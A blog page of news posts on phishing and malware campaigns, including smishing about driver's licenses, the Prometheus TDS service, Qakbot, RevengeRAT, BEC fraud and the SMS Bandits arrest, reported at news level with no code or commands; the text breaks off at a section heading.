Search This Blog

Showing posts with label phishing. Show all posts

Driver's License Exploitation Scams Surge

 

The Covid epidemic has provided a ripe opportunity for cybercriminals, who are taking advantage of internet information from outdated driver's licenses of targeted individuals. 

According to Stateline, the “phishing” scams benefit from the fact that several nations have made emergency declarations permitting driver's licenses to remain in force beyond expiry dates. With the expiration of such renewals, drivers must now ensure that their licenses are updated, but scammers are taking full advantage of that shift, according to Stateline. 

In conventional phishing, cybercriminals send malicious links or attachments via email, and victims inadvertently click on them. Fraudsters use messaging to conduct their operations, which is known as "SMS phishing" or "smishing." 

As per state motor vehicle agencies, driver's license phishing frauds attempts to steal individual identities and personal information, that have already been sprouting up across the United States. Iowa, Minnesota, Ohio, Vermont, and Wyoming are among the states in which the frauds have been detected until now. 

Scam artists send out SMS or emails making false claims that the target's license needs an urgent update, as some of the information is missing, or even that it is about to expire and will be invalid within a few days. When a person clicks the hyperlink, a Google Forms spreadsheet with personally identifiable information such as a Social Security number and birth date is often opened. 

“It’s despicable,” said David Druker, a spokesperson for the Illinois secretary of state’s office, which issues driver’s licenses. “It’s just outrageous that when the country is going through the COVID crisis, people are taking the time and energy to steal information from others.” 

A large number of people in Illinois, according to Druker, reportedly obtained texts and emails from fraudsters posing as the secretary of state or employees from the state transportation department. Druker also added that he had no idea if anyone else has succumbed to the ruses. 

Upon learning well about phishing and smishing, Illinois officials notified the FBI and IRS, who had collaborated with Google to remove the bogus webpages. According to Druker, the authorities have discovered 1,035 sites so far, and Google has halted nearly 900 such websites. 

As per a notice issued earlier this month by the U.S. Department of Health and Human Services' Office of Inspector General, fraudsters are now employing door-to-door visits, along with telemarketing calls, messages, and social networking sites, to conduct COVID-19-related frauds. 

“Do not provide personal, medical, or financial details to anyone in exchange for vaccine information, and obtain vaccinations from trusted providers,” the Office of Inspector General urges. 

“Posting content that includes your date of birth, health care details, or other personally identifiable information can be used to steal your identity,” said the Inspector General’s office.

Experts Discover Promotheus TDS, An Underground MaaS

 

Cybersecurity experts from Group-IB in its technical research on Promotheus TDS, an underground MaaS (Malware as a service), found that it has been providing service for distribution of various malware variants such as Campo Loader, Buer Loader, Qbot, Hancitor, IcedID, and SocGholish. Promotheus has been in aggressive use in underground forums since last year. It is a platform where one can send emails, perform social engineering and work along traffic. Besides this, TDS (Traffic Direction System) can also be used for web shell execution and redirecting creation and management, work using proxy, compatible with Google accounts, and also enable users against blacklists. 

Security Week reports "typical attack involving Prometheus TDS starts with a malicious email that either carries a HTML file to redirect the victim to a compromised site, a link to a web shell that performs a redirection. Once the victim follows the link, they are redirected to the Prometheus.Backdoor URL where their data is collected and sent to the Prometheus TDS admin panel, which decides how to serve the next stage." The service can be availed for $250 on a monthly basis. Besides providing distribution of malicious files, TDS is also used for redirecting victims to malicious and Phishing sites. 

The first campaign of Promotheus TDS was found in 2021, along with additional active campaigns, and a total of 3000 users have been found till date. TDS includes of an administrator panel that lets hackers to modify different parameters for malware campaigns, consisting download of malicious files, restricting geolocation, operating systems and browser. Third-party compromised sites are used as a leverage between victims and administrative panels. Experts found a PHP file named 'Promotheus' backdoor in one of these sites. 

It is built to steal user data and transmit it. "The service has been used to send malicious emails to more than 3,000 addresses to date. The most active campaign targeted individuals in Belgium (more than 2,000 emails), while the second largest attack targeted US entities (more than 260 emails targeting government agencies and organizations in sectors such as finance, insurance, healthcare, energy and mining, retail, IT, and cybersecurity)," said the Security Week.

Crime-as-a-Service Makes Advanced Phishing Attacks Easier For Amateurs

 

CaaS (Crime as a Service) is a practice where veteran hackers sell tools and knowledge required to perform a cybercrime. Generally, CaaS is used for executing phishing attacks. Phishing is one of the easiest ways to hack into any organization for any hacker. Earlier, to perform a phishing attack needed an experienced threat actor's technical proficiency and knowledge of social engineering. But, with the rise of CaaS, any normal individual with no prior knowledge of cyberattacks can become a hacker. 

CaaS provides an amateur attacker with anything required to perform their personal phishing attack, varying from branded email templates to detailed target lists. There is also an option for hackers to pay for already compromised servers, it saves them from the fear of getting tracked. By minimizing risks to get caught, the trend has made it simple to carry out a cyberattack. However, it has become a major inconvenience for organizations that are becoming targets. Besides this, CaaS offers technical advantages, with the help of downloaded templates, noob attackers can execute safe attacks that will safely land in any employee's inbox. 

By using sophisticated methods like inspection blocking, content encryption, and hidden URL's in attachments to avoid detection. This enables hackers to perform high-level advanced attacks, which has become a serious issue for organizations. Besides being easy to execute, phishing campaigns are also highly effective. Phishing attacks carried out using CaaS tools are built to target employees, which makes it difficult for organizations. The attacker uses social engineering techniques to exploit end-users, by gaining trust and creating a feeling of immediacy to reply. 

Hackers can use open-source intelligence to steal data from organization websites, past breaches, and social media to execute successful spear-phishing campaigns. HelpNetSecurity says "Crime-as-a-Service has made phishing an even more attractive method of attack for cybercriminals, by making it more accessible and less labor-intensive. Why spend months looking for an organization’s security vulnerabilities when you can hit them with a ready-made phishing attack? It’s also made phishing campaigns more easily scalable because it takes criminals takes less time and effort to execute their attacks."

Chipotle's Email Marketing Account Compromised to Spread Malware

 

In mid-July, a new phishing attack was detected that used a compromised mailing service account. In the four days between July 13, 2021, and July 16, 2021, the anti-phishing company uncovered 121 phishing emails in this campaign. 

In May 2021, Nobelium (suspected of being behind the SolarWinds attack) tried a similar phishing method. Microsoft reported in May on a Nobelium campaign in which fraudulent emails were delivered to 3,000 accounts across 150 companies in 24 countries. All of the fraudulent emails were sent by Constant Contact mailing service, using the hacked account of the US Agency for International Development (USAID). 

Inky, the anti-phishing firm identified the new campaign, and the amount is likely to be a small fraction of the overall number of emails sent. Inky states in its study that it is examining if the current campaign was initiated by the same threat actor or by copycat criminals using the same approach as Nobelium. 

The method comprises of hacking into a legitimate mail service user's account. The account used in the most recent instance belonged to Chipotle, a fast-food chain, and the mail provider used was Mailgun. Because the emails look authentic from high-reputation sources, this approach has a high success rate. 

Since they come from a high-reputation IP address (Mailgun: 166.78.68.204) and pass SPF and DKIM authentication, the emails clear various automated phish detection systems. 

Two were vishing attacks (phony voicemail alerts with malware attachments), 14 impersonated the USAA Bank, and 105 impersonated Microsoft, out of 121 phishing emails discovered. Inky does not specify what malware was used in the vishing attacks, nor does it mention the firms which were phished. 

A mail.chipotle[.]com link in the 14 USAA bank impersonations was linked to a fake and fraudulent USAA Bank credential harvesting site. The credential harvesting site is a convincing copy of the legitimate bank site, along with a flawless logo of USAA logo. 

The researchers commented, “The black hats can make these pages by simply cloning the real page, changing just one or two details to the underlying HTML, and voila! A credential-harvesting page is born.” 

The majority of phishing emails masquerade to be from Microsoft. This is predictable, given that nearly everyone has a Microsoft account, and almost all store a wealth of information (such as other logins, trade secrets, financial details, and more). 

In the sample presented by Inky, the email is sent by ‘Microsoft 365 Message Center'. The subject reads, “You have (7) clustered/undelivered emails 16 July 2021,” This should not mislead an informed user who wonders why Microsoft is sending emails through a fast-food chain, but it may deceive automated detection systems that depend largely on the sender reputations. 

The email's body is a classic fraud trap. Seven emails from the target have been held up due to storage difficulties, but they are now ready for collection (the curiosity trigger). Ignoring the notification may result in the account being disabled (the fear trigger). Then there's a button that says "Release messages to the inbox." The user is sent to a credential harvesting fake Microsoft login page when they click this button. 

The difference between the sender's name (in this case, Microsoft, USAA, and VM Caller ID) and the actual email sender (in this case, postmaster[@]chipotle[.]com) is the key to identifying this sort of phishing email. The former is unlikely to send emails using the latter. However, on the other hand, secure email gateways frequently rely on verifying simply whether the sending domain is authentic and that the email is coming from an approved range of IP addresses.

Oil & Gas Targeted in Year-Long Cyber-Espionage Campaign

 

A sophisticated campaign aimed at big multinational oil and gas firms has been running for more than a year, spreading common remote access trojans (RATs) for cyber-espionage objectives, as per researchers. 

According to Intezer analysis, spear-phishing emails with malicious links are used to deploy RATs such as Agent Tesla, AZORult, Formbook, Loki, and Snake Keylogger on infected computers all with the goal of stealing confidential data, banking information, and browser information, as well as logging keyboard strokes. 

While energy corporations are the primary targets, the campaign has also targeted a few companies in the IT, industrial, and media industries, as per researchers. Its targets are primarily based in South Korea, but include companies from the United States, United Arab Emirates, and Germany, too. 

The report states, “The attack also targets oil and gas suppliers, possibly indicating that this is only the first stage in a wider campaign. In the event of a successful breach, the attacker could use the compromised email account of the recipient to send spear-phishing emails to companies that work with the supplier, thus using the established reputation of the supplier to go after more targeted entities.” 

According to Intezer, “The company is FEBC, a religious Korean Christian radio broadcaster that reaches other countries outside of South Korea, many of these countries which downplay or ban religion. One of FEBC’s goals is to subvert the religion ban in North Korea.” 

Modus Operandi of the Attack:

According to analysts, the attackers launch the attack by sending emails customized to the staff at each of the companies targeted. The email addresses of the recipients range from basic (info@target company[.]com, sales@target company[.]com) to particular persons inside organizations, implying various levels of reconnaissance. 

The email addresses used in the "From" box are typo squatted or forged to provide the impression of authenticity. They are designed to seem like emails from real organizations that the targets are familiar with. Typosquatting fools email recipients into believing that an email has been sent from a trusted entity. 

“The contents and sender of the emails are made to look like they are being sent from another company in the relevant industry offering a business partnership or opportunity,” according to Intezer. 

Other attempts to appear official include making references to executives and utilizing the physical addresses, logos, and emails of genuine organizations in the text of the emails. As per the posting, these also contain requests for quotes (RFQ), contracts, and referrals/tenders for genuine projects linked to the targeted company's business. 

The file name and icon of the attachment in the majority of these emails seem like a PDF. Intezar experts stated the goal is to make the file appear less suspicious, entice the targeted user to open and read it. An information stealer is executed when the victim opens the attachment and clicks on the files it contains. 

Intezer also highlighted that the malware's execution is fileless, meaning it is loaded into memory without generating a file on disc, in order to avoid detection by standard antivirus. 

A Social-Engineering Bonanza: 

According to experts, while the technological parts of the operation are pretty standard, cyber attackers excel when it comes to social engineering and completing their study on their targets. 

One email, for example, claimed to be from Hyundai Engineering and mentioned an actual combined cycle power plant project in Panama. The email instructs the recipient to submit a bid for the project's equipment supply and includes more data and requirements "in the attached file" (containing the malware). In addition, the communication specifies a firm deadline for proposal submissions. 

Another email examined by Intezer researchers was sent to an employee of GS E&C, a Korean contractor involved in a number of worldwide power plant projects. The email requested both technical and commercial proposals for the goods listed in the attached, which was ostensibly a material take-off (MTO) document. 

Researchers stated, “The content of the emails demonstrates that the threat actor is well-versed in business-to-business (B2B) correspondence. This extra effort made by the attacker is likely to increase the credibility of the emails and lure victims into opening the malicious attachments.”

Israeli Chief-of-Staff was Hacked by an Iranian State-Sponsored Cybercriminal

 

According to the Times of Israel, an Iranian cybercriminal targeted the computer of a former IDF chief of staff and acquired access to his complete computer database. Yaser Balaghi was identified as the hacker by Channel 10. After the hack, he allegedly brags about it, while also unwittingly leaving a trail of his identity. Iran was compelled to stop a cyber operation that had targeted 1,800 persons around the world, including Israeli army generals, Persian Gulf human rights campaigners, and academics, due to this oversight. 

After Check Point, an Israeli cybersecurity firm, confirmed the Iranian hacking operation's existence two weeks ago, the Times of Israel was the first to report on it. The information from Check Point was also shown in a Channel 10 report on Tuesday. The attack began two months prior, according to Gil Shwed, CEO of Check Point Software Technologies, who told Israel Radio in late January that targets received email messages aimed at installing malware on their computers. More than a quarter of those who received the emails clicked them, unknowingly downloading spyware and allowing the hackers to steal data from their hard drives. 

Hezbollah and the Iranian regime have attacked Israel multiple times in the last two years. In the previous two years, Israel has been the target of several cyberattacks. Some of the infiltration attempts, according to officials, were carried out by hackers linked to Hezbollah and the Iranian government. 

Late in January, Israel's Electric Authority was the target of a significant cyberattack, according to Energy Minister Yuval Steinitz. He didn't say where the attack was coming from, though. ClearSky, an Israeli cybersecurity firm, said in June that it has detected a continuous wave of cyberattacks emanating from Iran against targets in Israel and the Middle East, with Israeli generals once again being among the targets. The company claims that the goal is espionage or other nation-state goals. 

According to ClearSky, the hackers utilize targeted phishing techniques to gather user identity data by creating phoney websites that appear legitimate and trustworthy. They were successful in penetrating 40 targets in Israel and 500 sites worldwide. Retired generals, employees of security consultancy organizations, and academic experts were among the targets in Israel.

Pay Attention: These Unsubscribe Emails Only Lead to Further Spam

 

Scammers send out fake 'unsubscribe' spam emails to validate legitimate email addresses for future phishing and spam campaigns. 

Spammers have been sending emails that merely inquire if the user wants to unsubscribe or subscribe for a long time. These emails don't specify what the user is unsubscribing or subscribing to, and spammers are using them to see if the recipient's email address is real and vulnerable to phishing scams and other nefarious activity. 

If they get the needed confirmation, they’ll bombard it with various spam emails. The campaign is simple in design - the victim will get a basic email with this call to action in it asking whether the consumer wants to unsubscribe or subscribe: 

“Please confirm your Subscribe (sic) or Unsubscribe. Confirm Subscribe me! Unsubscribe me! Thank you!” 

If the user clicks on the embedded subscribe/unsubscribe links, the mail client will generate a new email that will be forwarded to a large number of different email addresses controlled by the spammer. 

After sending the mail, users expect to be unsubscribed from future communications but they are, however, confirming for the spammers that their email address is real and under surveillance. 

BleepingComputer created a new email account for testing purposes, which they never used on any website or service. When they responded to multiple confirmation emails received on another email account using the new email address. After sending unsubscribe/subscribe responses from the new account, their new account was bombarded with spam emails within a few days. 

This test also revealed that spammers are utilizing these subscribe/unsubscribe emails to fine-tune their mailing lists and confirm email addresses that are vulnerable to phishing and frauds. 

It was also stated that these attacks aren't restricted to spam emails; nothing stops scammers from using phishing or social engineering against the target email, which is sometimes more hazardous and difficult to detect and stop. 

Consumers should never click any links they receive in an email unless they are fully certain of the sender's validity and the link's integrity, according to security experts. No credible company will ever send an email with only the alternatives to "Subscribe or Unsubscribe" and without any information.

RevengeRAT is Targeting the Aerospace and Travel Sectors with Spear-Phishing Emails

 

Microsoft has released a warning about a remote access tool (RAT) called RevengeRAT, which it claims has been used to send spear-phishing emails to the aerospace and travel industries.

RevengeRAT is a remote access trojan (RAT) that is classified as a high-risk computer infection. This malware aims to give cybercriminals remote access to infected computers so they can manipulate them. According to research, cybercriminals spread this infection through spam email campaigns (malicious MS Office attachments). Having a trojan-type infection on your device, such as RevengeRAT, can cause a slew of problems. 

They can use RevengeRAT to monitor system services/processes/files, edit the Windows Registry and hosts file, log keystrokes, steal account passwords, access hardware (such as a webcam), run shell commands, and so on. As a result, these individuals have the potential to cause serious harm. 

RevengeRAT, also known as AsyncRAT, is spread by carefully designed email messages that instruct recipients to open a file that appears to be an Adobe PDF attachment but actually installs a malicious visual basic (VB) file. 

The two RATs were recently identified by security company Morphisec as part of a sophisticated Crypter-as-a-Service that delivers multiple RAT families. The phishing emails, according to Microsoft, transmit a loader, which then delivers RevengeRAT or AsyncRAT. Morphisec claims it is also able to supply the RAT Agent Tesla. 

"The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads," Microsoft said. 

Morphisec called the cryptor service "Snip3" after a username it discovered in earlier malware variants. If Snip3 detects that a RAT is being executed inside the Windows Sandbox – a virtual machine security feature Microsoft launched in 2018 – it will not load it. Advanced users can use the Windows Sandbox to run potentially malicious executables in a secure sandbox that won't harm the host operating system.

"If configured by [the attacker], the PowerShell implements functions that attempt to detect if the script is executed within Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments," Morphisec notes. "If the script identifies one of those virtual machine environments, the script terminates without loading the RAT payload."

Fake Chrome App is Being Used as Part of a Cyberattack Campaign

 

According to researchers at cybersecurity company Pradeo, a new Android malware has been discovered that imitates the Google Chrome software and has already infected hundreds of thousands of smartphones. The hazard has been labeled a "Smishing Trojan" by the researchers. 
 
According to the researchers, the false Google Chrome app is part of a smartphone attack campaign that uses phishing to steal your credit card information. By downloading the fake software, the device becomes a part of the attack campaign as well. 

“The malware uses victims’ devices as a vector to send thousands of phishing SMS. We evaluate that the speed at which it is spreading has enabled it to already target hundreds of thousands of people in the last weeks. ”, said the researchers in their ‘Security Alert’ post on their website. 

The assault begins with a simple "smishing" gambit, according to Pradeo researchers: targets receive an SMS text telling them to pay "custom fees" to open a package delivery. If they fall for it and press, a message appears informing them that the Chrome app needs to be updated. If they accept the order, they'll be directed to a malicious website that hosts the phony app. It is, in reality, ransomware that is downloaded into their phones. 

After the ostensible "update," victims are directed to a phishing list, which completes the social engineering: According to the study, they are asked to pay a small sum (usually $1 or $2) in a less-is-more strategy, which is of course just a front to collect credit card information.

“Attackers know that we’re accustomed to receiving alerts of all types on our smartphones and tablets,” Hank Schless, senior manager of security solutions at Lookout said. “They take advantage of that familiarity to get mobile users to download malicious apps that are masked as legitimate ones.” 

The campaign is especially risky, according to Pradeo researchers, because it combines an effective phishing tactic, dissemination malware, and multiple security-solution bypasses. “The attack could be the work of a regular level but very ingenuous cybercriminal,” Pradeo’s Roxane Suau said. “All the techniques (code concealment, smishing, data theft, repackaging…) used separately are not advanced, but combined they create a campaign that is hard to detect, that spreads fast and tricks many users.”

Microsoft Detected a BEC Campaign Targeted at More than 120 Organizations

 

Microsoft discovered a large-scale business email compromise (BEC) program that attacked over 120 organizations and used typo-squatted domains that were registered only days before the attacks began. Cybercriminals continue to harass companies in order to deceive recipients into accepting fees, exchanging money, or, in this case, buying gift cards. This kind of email attack is known as business email compromise (BEC), which is a dangerous type of phishing aimed at gaining access to sensitive business data or extorting money via email-based fraud.

In this operation, Microsoft discovered that attackers used typo-squatted domains to make emails appear to come from legitimate senders in the consumer products, process manufacturing, and agriculture, real estate, distinct manufacturing, and professional services industries. 

BEC emails are purposefully crafted to look like regular emails as if they were sent from someone the intended client already knows, but these campaigns are much more complicated than they seem. They necessitate planning, staging, and behind-the-scenes activities. 

"We observed patterns in using the correct domain name but an incorrect TLD, or slightly spelling the company name wrong. These domains were registered just days before this email campaign began," the Microsoft 365 Defender Threat Intelligence Team said. 

Despite the scammers' best efforts, Microsoft found that "the registered domains did not always comply with the company being impersonated in the email." The attackers' surveillance capabilities are evident when they called the targeted workers by their first names, despite their methodology being faulty at times.  

To give authenticity to the phishing emails, scammers used common phishing tactics including bogus responses (improved by also spoofing In-Reply-To and References headers), according to Microsoft.

 
"Filling these headers in made the email appear legitimate and that the attacker was simply replying to the existing email thread between the Yahoo and Outlook user," Microsoft added. "This characteristic sets this campaign apart from most BEC campaigns, where attackers simply include a real or specially crafted fake email, adding the sender, recipient, and subject, in the new email body, making appear as though the new email was a reply to the previous email." 

Though the tactics used by these BEC scammers seem crude, and their phishing messages seem to be clearly malicious, BEC attacks have resulted in record-breaking financial losses per year since 2018. The FBI formed a Recovery Asset Team in 2018 intending to retrieve money that can still be traced and freezing accounts used by fraudsters for illegal BEC transactions.

Qakbot Malware is Targeting the Users Via Malicious Email Campaign

 

Qakbot, also known as QBot or Pinkslipbot, is a banking trojan that has been active since 2007. It has been primarily used by financially motivated actors, initially it was known as a banking Trojan and a loader using C2 servers for payload delivery; however, over time as the scope widened, its use also expanded beyond strictly being a banking trojan. 

Security researchers at Alien Labs have noticed a newly emerged campaign in which victims are targeted with malicious email lures that appear to be in response to, or modified versions of, legitimate business communications between two parties. 

The use of an existing legitimate email, aside from making the lure appear far more convincing to a recipient recognizing their own message and possibly the purported sender, is consistent with previously identified Qakbot behavior in which email accounts are compromised and message threads hijacked. This tactic effectively creates a 'snowball effect' in which more and more organizations can be targeted with lures derived from legitimate email messages obtained from previously compromised victims.

The malicious Office document, when opened, it poses as a DocuSign file – a popular software for signing digital documents. The malicious documents take advantage of Excel 4.0 macros (XML macros) stored in hidden sheets that download the QakBot 2nd stage payload from the Internet – malicious servers compromised by criminals. 

Before executing the main payload, the QakBot loader will first test the infected system to see if it is a good candidate for infection. The QakBot loader is responsible for checking its environment to include whether it is running on a Virtual Machine, identifying any installed and running security and monitoring tools such as Antivirus products or common security researcher tools. 

To make detection and analysis harder, QakBot encrypts its strings and decrypts them at runtime before use. Once the QakBot execution logic is finished using a string, it will immediately delete the string from memory. The hallmarks of a QakBot infection chain consist of a phishing lure (T1566) delivered via email chain hijacking or spoofed emails that contain context-aware information such as shipping, work orders, urgent requests, invoices, claims, etc. The phishing emails alternate between file attachments (T1566.001) and links (T1566.002). QakBot is often used as a gateway entry, similar to TrickBot or Emotet, that leads to post-exploitation operations leveraging frameworks such as Cobalt Strike as well as delivering Ransomware.

Threat Actors are Using Telegram & Google Forms to Obtain Stolen User Data

 

Security researchers have noted an increase in the misuse of legitimate services such as Google Forms and Telegram for gathering user data stolen on phishing websites. Emails remain the popular method among threat actors to exfiltrate stolen data but these methods foreshadow a new trend in the evolution of phishing kits.

After analyzing the phishing kits over the past year, researchers at cybersecurity company Group-IB observed that more of these tools permit collecting users' stolen data using Google Forms and Telegram. 

What is a phishing kit? 

A phishing kit is a toolset that helps design and run phishing web pages mimicking a particular brand or firm or even several at once. Phishing kits are often sold to those hackers who do not have exceptional coding skills. These phishing kits allow them to design an infrastructure for large-scale phishing campaigns.

By extracting the phishing kit, security researchers can examine the methodology used to carry out the phishing attack and figure out where the stolen data is sent. Besides, a thorough examination of the phishing kit helps researchers in detecting digital footprints that might lead to the developers of the phishing kit.

Latest trends of 2020 

Security researchers at Group-IB identified more than 260 unique brands which were on the target list of cybercriminals, most of them being for online services (30.7% - online tools to view documents, online shopping, streaming service, and more,) email customers (22.8%), and financial organizations (20%). The most exploited brands of 2020 were Microsoft, PayPal, Google, and Yahoo.

Another trend the researchers noticed was that the developers of phishing kits were double-dipping to increase their profits by adding code that copies the stream of stolen data to their network data host. Security researchers explained that one method is by configuring the ‘send’ function to deliver the information to the email provided by the buyer of the phishing kit as well as the ‘token’ variable linked with a concealed email address.

“Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocking phishing websites with new web pages,” Yaroslav Kargalev, Deputy Head at CIRT-GIB, stated.

“LinkedIn Private Shared Document” Shared Via Phishing Email by Hackers

 

LinkedIn seems to have become a popular destination for phishing attacks and users have been attacked with phishing emails in the recent scam on the site. With the public becoming more familiar with the standard tactics used to attack them, cybercriminals had to adopt new tactics in order to prevent identification. 

JB Bowers, a security investigator, found that hackers use LinkedIn to target users to give up their login credentials. The scheme attempts to get dubious users to open a "LinkedIn Private Shared Document," after which their login credentials are requested to access the falsified LinkedIn page. The message prompts the receiver to follow a reference from a third party to access a document.

Any user who obtains an unwanted message through the internal messaging system of LinkedIn via an unidentified contact must be extremely careful. In particular, this is true if users are requested to enter their login details. Users who mistakenly input their login credentials could often receive phishing messages which their LinkedIn contacts can also see. 

As to why hackers attack LinkedIn users, it may be because regular LinkedIn users have strong revenue than normal and are perceived as higher-value targets. Or since LinkedIn links to another Microsoft service, such as Office 365, it could contribute to more identity leakage if a LinkedIn account is hacked. As the name suggests, Phishing attempts to lure users to send confidential details. This could take the form of emails offering a free smartphone or something more formal, as in the aforementioned case. Further targets of phishing attacks are- colleges and businesses. Hackers are now getting more advanced and will send you a bogus email that appears to have originated from your employers since LinkedIn tells them who you are dealing with. Phishing pages are hosted in sites where there are also legitimate business purposes, such as Firebase and Pantheon.io, making access by companies unlikely. 

“The sites use major ASNs including Fastly, Google, and Microsoft, making basic network traffic analysis for the end-user also not so useful,” Bowers stated.

Employees must be advised to identify this form of intrusion leading to a broader breach of enterprise processes and networks. A further alternative is to block the usage of social media/networks on working devices, but it might not be good for workers. The victims will be made aware of the deception and have to let their LinkedIn friends also know about it. In some instances, some of them will find themselves fooled and have to go through the same method. 

“If you see any more LinkedIn messages like this […] you’ll want to let that person know out of band that their account has been compromised and that they should update their LinkedIn password, as well as report the abuse to LinkedIn,” Bowers advised.

Microsoft Office Phishing Attack Hosted on Google Firebase

 

A phishing campaign set on stealing Microsoft login credentials is utilizing Google Firebase to bypass email security efforts in Microsoft Office 365, researchers said. 

Researchers at Armorblox revealed invoice-themed emails sent off to at least 20,000 mailboxes that indicate to share data about an electronic funds transfer (EFT) payment. The emails convey a genuinely vanilla subject line, “TRANSFER OF PAYMENT NOTICE FOR INVOICE,” and contain a link to download an “invoice” from the cloud.

Clicking on that link starts a progression of redirects that at last takes targets to a page with Microsoft Office branding that is facilitated on Google Firebase. That page is obviously a phishing page, designed to collect Microsoft log in data, secondary email addresses, and phone numbers. “Since all workplace accounts are so closely interlinked, sharing credentials to one of your accounts can prove to be very dangerous as cybercriminals send emails in your name to trick your customers, partners, acquaintances and family members,” as indicated by Armorblox. 

Impersonating Microsoft to phish for account credentials continues being an incredible method since it's a way for attackers to embed themselves into typical business work processes, said Rajat Upadhyaya, head of engineering at Armorblox. “Viewing documents via Office 365 is something we do every day, so victims might think it’s not unusual to enter login credentials in this situation,” Upadhyaya added. “Plus, hosting the final phishing page on Google Firebase lends the domain inherent legitimacy and allows it to bypass email security blocklists and filters.” 

The email assault bypassed native Microsoft email security controls. Microsoft appointed a Spam Confidence Level (SCL) of '1' to this email, which implies that the tech giant didn't decide the email as dubious and conveyed it to end-user mailboxes. Strangely, by facilitating the phishing page HTML on Google Firebase, an inherently trusted domain, the emails had the option to nip past underlying Microsoft security filters, including Exchange Online Protection (EOP) and Microsoft Defender for Office 365.

For better protection against email-borne threats, employees ought to be prepared to engage with emails identified with cash and information with an "eye test" that incorporates investigating the sender name, sender email address, language inside the email, and any legitimate irregularities inside the email, as per Armorblox.

Financial Conduct Authority of UK Hit by 2,40,000 Spam Mails, Some Contain Malware

 

Financial Regulator of UK was spammed by almost a quarter of a million (240,000) malicious emails in the Q4 of the year 2020. The FOI data gives important highlights about the tremendous pressure that big organizations are facing to protect their assets. Griffin Law, a litigation firm, has filed an FOI with an influential London-based agency, the FCA (Financial Conduct Authority). As per Gov.UK, "The Financial Conduct Authority (FCA) regulates the financial services industry in the UK. Its role includes protecting consumers, keeping the industry stable, and promoting healthy competition between financial service providers." 

The firm says that FCA was spammed with around 240,000 malicious emails (also unsolicited) during the course of the last three months of 2020, an average of 80,000 emails per month. November observed the highest mails-84,723, whereas October had 81,799 and December 72,288. Most of the mails were listed as "spams" whereas more than 2400 mails had malware containing trojans, bugs, worms, and spyware, says the report. Fortunately, the FCA had blocked all the malicious emails that it received, however, the main threat isn't from these mails but from targeted spear-phishing campaigns. Tim Saddler, CEO, Tessian, emphasizes that phishing emails have become a persistent threat today because it is easy to target humans than to hack machines. 

Tim said, "cyber-criminals, undoubtedly, want to get hold of the huge amounts of valuable and sensitive information that FCA staff have access to, and they have nothing but time on their hands to figure out how to get it." He further says, "it just takes a bit of research, one convincing message or one cleverly worded email, and a distracted employee to successfully trick or manipulate someone into sharing company data or handing over account credentials." 

This is not the first time when the Regulator has sidelined its cybersecurity issue. In February last year, Regulator had to apologize on public forums when it accidentally posted personal information (including name and address) of the few users who had lodged complaints against the agency. The irony is, the data leak happened as a Regular's solution to an FOI request.

National Crime Agency Detained the Operator of SMS Bandits for Phishing Message Services

 

The National Crime Agency of the United Kingdom has announced the arrest of the Service 'SMS Bandits' operator. However NCA did not disclose the suspected fraudster's identity, the cybercrime department of the Metropolitan Police has announced the detention of a Birmingham citizen who is linked to the company offering illicit phishing services. The aforementioned platform was used to send large amounts of phishing SMS. The fraudster had sent out a humungous number of fake messages by spoofing organizations like PayPal, some telecom providers, COVID-19 pandemic relief organizations, etc. 

SMS Bandits, including the man detained, got access to account credentials from numerous popular web pages, offered on dark web platforms that they controlled by sending fake SMSs by millions. Among other pseudonyms, Bamit9, Gmuni, and Uncle Munis are also used by the fraudulent service providers on the dark web. For mass transmission of texts intended to collect account credentials on various common websites and to steal personal and financial information, SMS bandits supplied an SMS phishing service for the mass transmission of text messages. 

Angus, a researcher at the Scylla Intel, a cyber intelligence firm, stated that the SMS Bandits sent phish lures that always made it possible to detect a fake message uncommonly, well done, and clean of syntax or orthographer's errors. “Just by virtue of these guys being native English speakers, the quality of their phishing kits and lures were considerably better than most,” Angus further added. 

According to Scylla Intel, the SMS Bandits made a variety of organizational security errors that made it relatively easy to figure out who they are in actuality. Scylla Intel further collected evidence against the SMS Bandits' and figured out that the SMS Bandits used the email addresses and passwords stolen from its services to validate the credentials. 

According to the sources, the SMS Bandits are also related to a dark web criminal program named, “OTP Agency”, a service that is designed to intercept the one- time- password which is required while logging into various websites. The modus operandi involves the customer entering the target’s phone number and name, and then the OTP Agency initiating an automated phone call to the target that alerts them about unauthorized activity on their account. 

SMS Bandits has also offered its patented "bulletproof hosting," which has been marketed as a "freedom of communications" portal, where clients can "host any content without restrictions." The content inevitably shapes the sites on which users of different web platforms are entitled to phish credentials.

According to a new survey, the amount of SMS phishing grew by over 328% in 2020. As a consequence of this, we do not see any feeling of terror among the fraudsters.

Users on Alert as Text Scamming Attack on The Rise


The fear of scam messages may seem far now, and even distant.  With the rise of well-engineered and sophisticated attacks in recent time,  the threat of scam messaging attacks may seem low, however, they are still a persistent danger. SMS (short message service) scams are similar to email phishing attacks, they work through social engineering attacks. Popular as "Smishing" (SMS and phishing), the attacks try to lure victims into providing information and user access, which benefits the hacker.  

Present SMS hacking techniques 
The SMS scam warns users of a new, packaging delivery, which is considered to be better and effective than before. If the user replies, the hacker steals user data for money theft, identity theft, or stealing sensitive organization data.  In one particular attack, the message leads the victim to a website and then rewards with a small gift (a smartphone, for instance) in return, for filling a survey. The attackers ask for credit card credentials for shipping and then steals the money.  Similarly, another SMS scam variant uses fake bank messages for its attack. The hacker lures the victim to give away their banking credentials, and if the victim does so, the attacker uses Emotet malware to infect their devices.  Whereas in some scams, the victim is threatened with violence if he doesn't pay the ransom. The approaches in all these attacks may be different, but they all share a common goal, which is to gain access to personal information. In all these attacks, the victim is asked to open a link or go to a website, the hackers use these malicious links and websites to steal user data.  Some other scam campaigns use relief funds, food aids, bank, covid-19, or jury duty to fool the victim. It is quite difficult to grasp the content of these attacks, however, in the future, these attacks would be even more sophisticated and dangerous, with brand new content.   

Why these attacks are successful. 
